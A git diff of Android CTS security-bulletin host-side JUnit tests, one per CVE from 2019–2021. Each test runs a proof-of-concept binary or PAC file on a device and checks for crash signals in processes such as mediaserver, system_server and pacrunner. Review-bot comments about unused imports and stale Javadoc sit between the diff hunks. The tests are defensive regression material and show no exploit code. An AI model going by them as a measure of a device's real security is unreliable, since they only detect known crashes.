+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2044 extends SecurityTestCase {
+
+ /**
+ * b/123701862
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-05")
+ @Test
+ public void testPocCVE_2019_2044() throws Exception {
+ pocPusher.only32();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2044", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2099.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2099.java
new file mode 100644
index 00000000000..e20bb5cc815
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2099.java
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2099 extends SecurityTestCase {
+
+ /**
+ * b/123583388
+ * Vulnerability Behaviour: EXIT_VULNERABLE (113)
+ **/
+ @SecurityTest(minPatchLevel = "2019-06")
+ @Test
+ public void testPocCVE_2019_2099() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2099", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java
index db98e2858b0..68332436dbb 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java
@@ -33,6 +33,7 @@ public class CVE_2019_2135 extends SecurityTestCase { @SecurityTest(minPatchLevel = "2019-08") @Test public void testPocCVE_2019_2135() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); pocPusher.only64(); AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE_2019_2135", null, getDevice()); } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2206.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2206.java new file mode 100644 index 00000000000..20396acedff --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2206.java @@ -0,0 +1,38 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2019_2206 extends SecurityTestCase { + + /** + * b/139188579 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2019-11") + @Test + public void testPocCVE_2019_2206() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2206", null, getDevice()); + } +} 
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2207.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2207.java
new file mode 100644
index 00000000000..6f4340c159a
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2207.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2207 extends SecurityTestCase {
+
+ /**
+ * b/124524315
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-11")
+ @Test
+ public void testPocCVE_2019_2207() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2207", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0006.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0006.java
new file mode 100644
index 00000000000..efd1e548e27
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0006.java
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0006 extends SecurityTestCase {
+
+ /**
+ * b/139738828
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2020-01")
+ @Test
+ public void testPocCVE_2020_0006() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0006", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java
index 4e0a4a6e754..e6241349987 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java
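Review bot: `import com.android.tradefed.device.ITestDevice;` in the new CVE_2020_0006.java is unused: the test only calls `AdbUtils.assumeHasNfc`, `pocPusher.only64` and `AdbUtils.runPocAssertNoCrashesNotVulnerable`. The same unused import is added in CVE_2020_0073.java, CVE_2021_0393.java and CVE_2021_0396.java, and CVE_2021_0396.java additionally imports `org.junit.Assert.assertTrue` although the test body contains no assertion of its own. I would delete these lines so that each test's import list shows only what the test actually depends on.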
@@ -32,6 +32,7 @@ public class CVE_2020_0037 extends SecurityTestCase { @SecurityTest(minPatchLevel = "2020-03") @Test public void testPocCVE_2020_0037() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); pocPusher.only64(); AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0037", null, getDevice()); } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java index 6759c30caf3..5731c12a91a 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java @@ -32,6 +32,7 @@ public class CVE_2020_0038 extends SecurityTestCase { @SecurityTest(minPatchLevel = "2020-03") @Test public void testPocCVE_2020_0038() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); pocPusher.only64(); AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0038", null, getDevice()); } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java index f0f3323f20c..7d5ae378f34 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java @@ -32,6 +32,7 @@ public class CVE_2020_0039 extends SecurityTestCase { @SecurityTest(minPatchLevel = "2020-03") @Test public void testPocCVE_2020_0039() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); pocPusher.only64(); AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0039", null, getDevice()); } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0073.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0073.java new file mode 100644 index 00000000000..79826e7b940 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0073.java 
@@ -0,0 +1,46 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import com.android.tradefed.device.ITestDevice; +import com.android.compatibility.common.util.CrashUtils; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2020_0073 extends SecurityTestCase { + + /** + * b/147309942 + * Vulnerability Behaviour: SIGABRT in self + */ + @SecurityTest(minPatchLevel = "2020-04") + @Test + public void testPocCVE_2020_0073() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + String binaryName = "CVE-2020-0073"; + String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT}; + AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice()); + testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName); + testConfig.config.setSignals(signals); + AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0224.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0224.java new file mode 100644 index 00000000000..b02eeea126a --- /dev/null 
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0224.java @@ -0,0 +1,48 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.compatibility.common.util.CrashUtils; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import java.util.Arrays; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2020_0224 extends SecurityTestCase { + + /** + * b/147664838 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2020-07") + @Test + public void testPocCVE_2020_0224() throws Exception { + String inputFiles[] = {"cve_2020_0224.pac"}; + String binaryName = "CVE-2020-0224"; + String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT}; + AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice()); + testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName); + testConfig.config.setSignals(signals); + testConfig.config.checkMinAddress(false); + testConfig.arguments = AdbUtils.TMP_PATH + inputFiles[0]; + testConfig.inputFiles = Arrays.asList(inputFiles); + testConfig.inputFilesDestination = AdbUtils.TMP_PATH; + AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig); + } +} 
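Review bot: `testConfig.config.checkMinAddress(false);` in `testPocCVE_2020_0224` changes what counts as a failing crash and carries no comment. With the minimum-address check switched off, presumably any SIGSEGV, SIGBUS or SIGABRT in the PoC process is reported as vulnerable, including a fault at a near-null address, and someone triaging a CTS failure needs to know that this was intended for this bug. I would put a one-line comment above the call, for example `// Low-address faults count here: <reason specific to b/147664838>`. CVE_2020_0243.java in this commit makes the same call while watching `mediaserver` and would benefit from the same comment.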
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0243.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0243.java new file mode 100644 index 00000000000..4c2b91d63a6 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0243.java @@ -0,0 +1,40 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.compatibility.common.util.CrashUtils; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2020_0243 extends SecurityTestCase { + + /** + * b/151644303 + * Vulnerability Behaviour: SIGSEGV in mediaserver + */ + @SecurityTest(minPatchLevel = "2020-08") + @Test + public void testPocCVE_2020_0243() throws Exception { + AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig("CVE-2020-0243", getDevice()); + testConfig.config = new CrashUtils.Config().setProcessPatterns("mediaserver"); + testConfig.config.checkMinAddress(false); + AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig); + } +} 
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0383.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0383.java new file mode 100644 index 00000000000..2e1ca03f0a4 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0383.java @@ -0,0 +1,42 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import static org.junit.Assume.assumeFalse; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2020_0383 extends SecurityTestCase { + + /** + * b/150160279 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2020-09") + @Test + public void testPocCVE_2020_0383() throws Exception { + assumeFalse(moduleIsPlayManaged("com.google.android.media")); + String inputFiles[] = {"cve_2020_0383.xmf", "cve_2020_0383.info"}; + String binaryName = "CVE-2020-0383"; + AdbUtils.runPocAssertNoCrashesNotVulnerable(binaryName, + AdbUtils.TMP_PATH + inputFiles[0] + " " + AdbUtils.TMP_PATH + inputFiles[1], + inputFiles, AdbUtils.TMP_PATH, getDevice()); + } +} 
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0305.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0305.java
new file mode 100644
index 00000000000..dd2aff8ff0a
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0305.java
@@ -0,0 +1,63 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.AppModeInstant; +import android.platform.test.annotations.AppModeFull; +import android.util.Log; +import android.platform.test.annotations.SecurityTest; + +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import com.android.tradefed.testtype.junit4.BaseHostJUnit4Test; + +import org.junit.After; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; + +/** + * Test that collects test results from test package android.security.cts.CVE_2021_0305. + * + * When this test builds, it also builds a support APK containing + * {@link android.sample.cts.CVE_2021_0305.SampleDeviceTest}, the results of which are + * collected from the hostside and reported accordingly. + */ +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2021_0305 extends BaseHostJUnit4Test { + private static final String TEST_PKG = "android.security.cts.CVE_2021_0305"; + private static final String TEST_CLASS = TEST_PKG + "." 
+ "DeviceTest"; + private static final String TEST_APP = "CVE-2021-0305.apk"; + + @Before + public void setUp() throws Exception { + uninstallPackage(getDevice(), TEST_PKG); + } + + @Test + @SecurityTest(minPatchLevel = "2020-09") + @AppModeFull + public void testRunDeviceTestsPassesFull() throws Exception { + installPackage(); + Assert.assertTrue(runDeviceTests(TEST_PKG, TEST_CLASS, "testClick")); + } + + private void installPackage() throws Exception { + installPackage(TEST_APP, new String[0]); + } +} + diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0393.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0393.java new file mode 100644 index 00000000000..2160aca84bd --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0393.java 
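Review bot: The class Javadoc still describes the sample test it appears to have been copied from: it links `android.sample.cts.CVE_2021_0305.SampleDeviceTest`, while the code runs `TEST_PKG + "." + "DeviceTest"`, that is `android.security.cts.CVE_2021_0305.DeviceTest`, from `CVE-2021-0305.apk`. The comment should name that class, say what the `testClick` device test verifies, and record the bug number the way the sibling tests in this commit do. `AppModeInstant`, `android.util.Log` and `org.junit.After` are imported but not used. `minPatchLevel = "2020-09"` on a 2021 CVE id may well be right, but it is worth confirming against the bulletin, since it decides which devices are required to pass.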
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.device.ITestDevice;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0393 extends SecurityTestCase {
+
+ /**
+ * b/168041375
+ * Vulnerability Behavior: SIGSEGV in pacrunner
+ */
+ @SecurityTest(minPatchLevel = "2021-03")
+ @Test
+ public void testPocCVE_2021_0393() throws Exception {
+ pocPusher.only64();
+ AdbUtils.runProxyAutoConfig("cve_2021_0393", getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0396.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0396.java
new file mode 100644
index 00000000000..3df46a76740
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0396.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import static org.junit.Assert.assertTrue;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0396 extends SecurityTestCase {
+
+ /**
+ * b/160610106
+ * Vulnerability Behaviour: SIGSEGV in pacrunner
+ */
+ @SecurityTest(minPatchLevel = "2021-03")
+ @Test
+ public void testPocCVE_2021_0396() throws Exception {
+ AdbUtils.runProxyAutoConfig("cve_2021_0396", getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0430.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0430.java
new file mode 100644
index 00000000000..935b6010aaa
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0430.java
@@ -0,0 +1,37 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0430 extends SecurityTestCase {
+
+ /**
+ * b/178725766
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2021-04")
+ @Test
+ public void testPocCVE_2021_0430() throws Exception {
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2021-0430", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0439.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0439.java
new file mode 100644
index 00000000000..25802a00eb2
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0439.java
@@ -0,0 +1,38 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2021_0439 extends SecurityTestCase { + + /** + * b/174243830 + * Vulnerability Behaviour: SIGSEGV in system_server + */ + @SecurityTest(minPatchLevel = "2021-04") + @Test + public void testPocCVE_2021_0439() throws Exception { + String processPatternStrings[] = {"system_server"}; + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2021-0439", null, getDevice(), + processPatternStrings); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/HostsideOomCatcher.java b/hostsidetests/securitybulletin/src/android/security/cts/HostsideOomCatcher.java deleted file mode 100644 index d97c4dbfc0f..00000000000 --- a/hostsidetests/securitybulletin/src/android/security/cts/HostsideOomCatcher.java +++ /dev/null 
@@ -1,228 +0,0 @@ -/* - * Copyright (C) 2018 The Android Open Source Project - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -package android.security.cts; - -import com.android.tradefed.device.CollectingOutputReceiver; -import com.android.tradefed.device.DeviceNotAvailableException; -import com.android.tradefed.device.ITestDevice; -import com.android.tradefed.testtype.DeviceTestCase; -import com.android.tradefed.device.BackgroundDeviceAction; - -import android.platform.test.annotations.RootPermissionTest; - -import java.io.BufferedOutputStream; -import java.io.File; -import java.io.FileOutputStream; -import java.io.IOException; -import java.io.InputStream; -import java.io.OutputStream; -import java.util.Scanner; -import java.util.regex.Pattern; -import java.util.regex.Matcher; -import java.util.Map; -import java.util.HashMap; -import java.util.concurrent.ConcurrentHashMap; -import com.android.ddmlib.MultiLineReceiver; -import com.android.ddmlib.Log; -import com.android.ddmlib.TimeoutException; -import java.lang.ref.WeakReference; - -/** - * A utility to monitor the device lowmemory state and reboot when low. Without this, tests that - * cause an OOM can sometimes cause ADB to become unresponsive indefinitely. Usage is to create an - * instance per instance of SecurityTestCase and call start() and stop() matching to - * SecurityTestCase setup() and teardown(). 
- */ -public class HostsideOomCatcher { - - private static final String LOG_TAG = "HostsideOomCatcher"; - - private static final long LOW_MEMORY_DEVICE_THRESHOLD_KB = (long)(1.5 * 1024 * 1024); //1.5GB - private static Map<String, WeakReference<BackgroundDeviceAction>> oomCatchers = - new ConcurrentHashMap<>(); - private static Map<String, Long> totalMemories = new ConcurrentHashMap<>(); - - private boolean isLowMemoryDevice = false; - - private SecurityTestCase context; - - /** - * test behavior when oom is detected. - */ - public enum OomBehavior { - FAIL_AND_LOG, // normal behavior - PASS_AND_LOG, // skip tests that oom low memory devices - FAIL_NO_LOG, // tests that check for oom - } - private OomBehavior oomBehavior = OomBehavior.FAIL_AND_LOG; // accessed across threads - private boolean oomDetected = false; // accessed across threads - - public HostsideOomCatcher(SecurityTestCase context) { - this.context = context; - } - - /** - * Utility to get the device memory total by reading /proc/meminfo and returning MemTotal - */ - private static long getMemTotal(ITestDevice device) throws DeviceNotAvailableException { - // cache device TotalMem to avoid an adb shell for every test. - String serial = device.getSerialNumber(); - Long totalMemory = totalMemories.get(serial); - if (totalMemory == null) { - String memInfo = device.executeShellCommand("cat /proc/meminfo"); - Pattern pattern = Pattern.compile("MemTotal:\\s*(.*?)\\s*[kK][bB]"); - Matcher matcher = pattern.matcher(memInfo); - if (matcher.find()) { - totalMemory = Long.parseLong(matcher.group(1)); - } else { - throw new RuntimeException("Could not get device memory total."); - } - Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG, - "Device " + serial + " has " + totalMemory + "KB total memory."); - totalMemories.put(serial, totalMemory); - } - return totalMemory; - } - - /** - * Start the hostside oom catcher thread for the test. - * Match this call to SecurityTestCase.setup(). 
